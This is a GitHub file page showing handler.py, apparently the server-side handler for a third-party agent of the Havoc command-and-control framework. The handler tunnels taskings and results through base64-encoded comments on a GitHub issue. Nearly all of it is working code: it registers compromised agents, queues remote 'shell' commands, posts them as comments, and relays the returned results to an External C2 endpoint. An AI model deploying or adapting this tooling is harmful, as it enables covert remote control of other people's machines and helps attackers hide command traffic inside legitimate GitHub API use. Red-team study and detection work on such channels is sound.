-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathhandler.py
More file actions
252 lines (219 loc) · 7.97 KB
/
handler.py
File metadata and controls
252 lines (219 loc) · 7.97 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
from base64 import b64decode
import requests
import time
import os
import sys
import base64
import json
from havoc.service import HavocService
from havoc.externalc2 import ExternalC2
from havoc.agent import *
import os
# --- CONFIG ---
GITHUB_TOKEN = "ghp_XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
REPO_OWNER = "YOUR_USERNAME"
REPO_NAME = "your_repository"
ISSUE_LABEL = "HAVOCHUB"
HEADERS = {
"Authorization": f"token {GITHUB_TOKEN}",
"Accept": "application/vnd.github.v3+json"
}
HAVOC_SERVICE_ENDPOINT = "wss://127.0.0.1:443/YOUR_SERVICE_ENDPOINT"
HAVOC_SERVICE_PASSWORD = "YOUR_SERVICE_PASSWORD"
EXTERNAL_C2_ENDPOINT = "http://127.0.0.1/your_external_c2_endpoint"
sleeptime = 1
issue_number = 0
seen_comment_ids = set()
COMMAND_REGISTER = 0x100
COMMAND_GET_JOB = 0x101
COMMAND_NO_JOB = 0x102
COMMAND_SHELL = 0x152
COMMAND_EXIT = 0x155
COMMAND_OUTPUT = 0x200
# ====================
# ===== Commands =====
# ====================
class CommandShell(Command):
CommandId = COMMAND_SHELL
Name = "shell"
Description = "executes commands"
Help = ""
NeedAdmin = False
Params = [
CommandParam(
name="commands",
is_file_path=False,
is_optional=False
)
]
Mitr = []
def job_generate( self, arguments: dict ) -> bytes:
Task = Packer()
Task.add_data(arguments[ 'commands' ])
return Task.buffer
class CommandExit( Command ):
CommandId = COMMAND_EXIT
Name = "exit"
Description = "tells the python agent to exit"
Help = ""
NeedAdmin = False
Mitr = []
Params = []
def job_generate( self, arguments: dict ) -> bytes:
Task = Packer()
Task.add_data("goodbye")
return Task.buffer
# =======================
# ===== Agent Class =====
# =======================
class python(AgentType):
Name = "Havoc-Hub"
Author = "@ProcessusT"
Version = "0.1"
Description = f"""python 3rd party agent for Havoc"""
MagicValue = 0x41414141
Arch = [
"x64",
"x86",
]
Formats = [
{
"Name": "GitHub comments",
"Extension": "unknown",
},
]
BuildingConfig = {
"Sleep": "10"
}
Commands = [
CommandShell(),
CommandExit(),
]
def response( self, response: dict ) -> bytes:
try:
agent_header = response[ "AgentHeader" ]
print("[+] Receieved request from agent")
agent_header = response[ "AgentHeader" ]
agent_response = b64decode( response[ "Response" ] ) # the teamserver base64 encodes the request.
json_data = b64decode( agent_response.decode("latin-1", errors="replace"))
agentjson = json.loads(json_data)
print(f"[+] Received request : {agentjson}")
print(f"[+] Agent headers : {agent_header}")
if agentjson["task"] == "register":
#print(json.dumps(agentjson,indent=4))
print("[+] Registered agent")
self.register( agent_header, json.loads(agentjson["data"]) )
AgentID = response[ "AgentHeader" ]["AgentID"]
self.console_message( AgentID, "Good", f"Python agent {AgentID} registered", "" )
return b'registered'
elif agentjson["task"] == "gettask":
AgentID = response[ "Agent" ][ "NameID" ]
self.console_message( AgentID, "Good", "Host checkin", "" )
print("[+] Agent requested taskings")
Tasks = self.get_task_queue( response[ "Agent" ] )
if len(str(Tasks)) > 1 :
task = Tasks[4:].decode('latin-1').strip('\x00').strip()
print(f"[+] Task retrieved : {task}")
global issue_number
payload_b64 = base64.b64encode(task.encode("latin-1", errors="replace")).decode("latin-1", errors="replace")
print("[+] Sending task to agent")
comment_id = post_comment(issue_number, payload_b64)
global seen_comment_ids
seen_comment_ids.add(comment_id)
print("[+] Task sent !")
else:
print("[+] No tasks for the moment.")
Tasks = b''
elif agentjson["task"] == "result":
print("[+] Command result received !")
print(agentjson)
AgentID = response[ "Agent" ][ "NameID" ]
self.console_message( AgentID, "Good", "Command result received :", str(agentjson["data"]) )
Tasks = b''
return Tasks
except:
pass
# ===============================
# ====== GitHub functions =======
# ===============================
def get_last_issue_number():
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues"
params = {
"state": "open",
"sort": "created",
"direction": "desc",
"per_page": 1
}
r = requests.get(url, headers=HEADERS, params=params)
if r.status_code == 200 and len(r.json()) > 0:
latest_issue = r.json()[0]
return latest_issue["number"], latest_issue["title"]
else:
raise Exception("Impossible de récupérer la dernière issue Github.")
def post_comment(issue_number, payload_b64):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
data = {'body': payload_b64}
r = requests.post(url, headers=HEADERS, json=data)
if r.status_code == 201:
comment = r.json()
comment_id = comment.get('id')
return comment_id
else:
return False
def get_last_command(issue_number, seen_comment_ids):
url = f"https://api.github.com/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments"
r = requests.get(url, headers=HEADERS)
comments = r.json()
for comment in comments:
comment_id = comment['id']
if comment_id not in seen_comment_ids:
text_b64 = comment.get('body','').strip()
if text_b64 and len(text_b64)>20:
return comment_id, text_b64
return None, None
def main():
# Handling service API
Havoc_python = python()
print( "[+] Connect to Havoc service api..." )
havoc_service = HavocService(
endpoint=HAVOC_SERVICE_ENDPOINT,
password=HAVOC_SERVICE_PASSWORD
)
print( "[+] Register python to Havoc..." )
havoc_service.register_agent(Havoc_python)
# Connecting to external C2 endpoint
print( "[+] Connect to Havoc endpoint..." )
externalc2 = ExternalC2( EXTERNAL_C2_ENDPOINT )
print( f"[+] ExternalC2 = {externalc2}")
# Retrieving last issue
global issue_number
issue_number, issue_title = get_last_issue_number()
print( f"[+] Last issue number is {issue_number}" )
# Retrieving checkin and command results
global seen_comment_ids
while True:
try:
comment_id, comment_b64 = get_last_command(issue_number, seen_comment_ids)
seen_comment_ids.add(comment_id)
comment_decoded = base64.b64decode(comment_b64)
print( f"[+] Last command is {str(comment_decoded)}")
size = len(str(comment_decoded[12:])) + 12 # le JSON + 4 (magic) + 4 (agentid) + 4 (size)
size_bytes = size.to_bytes(4, 'big')
magic = comment_decoded[4:8]
agentid = comment_decoded[8:12]
agentheader = size_bytes + magic + agentid
data_b64 = base64.b64encode(comment_decoded[12:])
transmission = agentheader + data_b64
print( f"[+] Transmission to C2 : {str(transmission)}")
response = externalc2.transmit( transmission )
time.sleep(sleeptime)
except Exception as e:
print(f"[!] Error : {e}")
time.sleep(sleeptime)
pass
return
if __name__ == '__main__':
try:
main()
except:
pass